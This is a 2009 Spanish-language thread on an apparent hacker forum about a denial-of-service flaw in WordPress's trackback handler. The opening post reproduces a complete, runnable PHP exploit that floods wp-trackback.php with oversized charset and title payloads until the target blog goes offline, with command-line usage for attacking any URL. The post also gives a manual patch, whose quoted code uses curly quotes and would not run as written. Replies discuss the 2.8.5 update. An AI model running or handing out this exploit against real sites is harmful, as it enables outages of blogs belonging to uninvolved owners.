Nuevo Bug grave en Wordpress

gfxgfx
 
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?

Ingresar con nombre de usuario, contraseña y duración de la sesión
 
gfx gfx
gfx
21208 Mensajes en 4872 Temas por 20717 Usuarios - Último usuario: Orietrant Mayo 20, 2012, 01:29:55
*
gfx*InicioAyudarssBuscarCalendarioIngresarRegistrarsegfx
gfxgfx
0 Usuarios y 1 Visitante están viendo este tema.       « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Nuevo Bug grave en Wordpress  (Leído 919 veces)
aron_marcos
HdL Beta
***
Desconectado Desconectado

Mensajes: 653



Ver Perfil
Nuevo Bug grave en Wordpress
« en: Octubre 24, 2009, 22:17:48 »
El problema radica en el archivo wp-trackbacks.php y permite a cualquier novato, individuo o persona, dejar offline a cualquier blog que use Wordpress como CMS, con tan solo 5 minutos y una veintena de consultas, si leyeron bien, solo 20 consultas no se necesitan botnes, redes zombies o supercomputadoras para hacer este tipo de ataque DoS.

Por el momento se ha publicado este exploit, creado en php y que se ejecuta en la consola, pasando por parametro la url del sitio vulnerable, algo asi:

php exploit.php http://blogvulnerable.com

Y aqui esta el codigo del exploit:

Código
Code (php):
<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo "You need to specify a url to attack\n";
exit;
} $url = $argv[1]; $data = parse_url($url);
if(count($data) < 2) {
echo "The url should have http:// in front of it, and should be complete.\n";
exit;
} if(count($data) == 2) {
$path = '';
} else {
$path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path{0} != '/') {
$path = '/'.$path;
} $b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol'; $count = 0;
while(1) {
$fp = @fsockopen($data['host'],80);
if(!$fp) {
if($count > 0) {
echo "down!!!!\n";
exit;
}
echo "unable to connect to: ".$data['host']."\n";
exit;
} fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n"); echo "hit!\n";
$count++;
} ?>

Todavia no existe parche para reparar el bug, la unica solucion conocida hasta el momento, es la que se manifiesta en el enlace donde nos cuentan el parche:

Editar el archivo wp-trackbacks.php y buscar esta linea:

Citar
$charset = $_POST['charset'];


y cambiarla por esta:

Citar
$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }


Para mas informacion pueden visitar http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/

en el cual explican mucho mas a fondo en que consiste el bug, asi pues, todos a corregir nuestro wordpress, para asi evitar futuros dolores de cabeza.

salu2

fuente: LTH
« Última modificación: Octubre 24, 2009, 22:30:59 por aron_marcos » En línea
fresh CC
Visitante


Email
Re: Nuevo Bug grave en Wordpress
« Respuesta #1 en: Octubre 25, 2009, 05:02:33 »
Citar
Actualizá a WordPress 2.8.5 para evitar falla de seguridad en trackbacks

Hace pocos días se reportó una falla de seguridad bastante grave que permitía tirar el servidor en cuestión de pocos minutos, abusando de una vulnerabilidad en “wp-trackbacks.php”, sobre el cual podemos leer los detalles en este sitio. Actualizando a la última versión, salida hace pocas horas, eliminamos esta falla y otros bugs menores reportados.

Recordá que podés actualizar desde el Tablero de tu WordPress teniendo los datos de cuenta y password del FTP o bien hacerlo desde un cliente FTP cualquiera.

La versión que está para descargar está en su idioma de origen, seguramente en unos días más saldrá la versión con el lenguaje español actualizado, pero si ya tenés instalado WordPress en español
En línea
djtuxy
Principiantes
*
Desconectado Desconectado

Mensajes: 124


Ver Perfil WWW
Re: Nuevo Bug grave en Wordpress
« Respuesta #2 en: Octubre 25, 2009, 11:14:33 »
entonces ya salio el fix?

:S
En línea


www.area403.com.ar <---------- Nuevo diseño , MAs innovador!! Mas contenidoo!! nuevos ADMS!!
aron_marcos
HdL Beta
***
Desconectado Desconectado

Mensajes: 653



Ver Perfil
Re: Nuevo Bug grave en Wordpress
« Respuesta #3 en: Octubre 25, 2009, 11:53:04 »
lean los comentarios del blog http://rooibo.wordpress.com/2009/10/17/agujero-de-seguridad-en-wordpress/ hay gente q a hecho la actualizacion a 2.8.5 y aun tiene el problema.

salu2
En línea
fresh CC
Visitante


Email
Re: Nuevo Bug grave en Wordpress
« Respuesta #4 en: Octubre 25, 2009, 14:54:00 »
Citar
Involucrarse con el 2.9 beta
Hemos estado trabajando duro ahora por unos meses en las nuevas características que vendrán en WordPress 2.9, y estamos cerca del momento en que la primera versión beta estará disponible.
En línea
gfx
Páginas: [1] Ir Arriba Imprimir 
gfx
Ir a:  
gfx
Powered by SMF 1.1.16 | SMF © 2006, Simple Machines
HDL Group hackers
gfx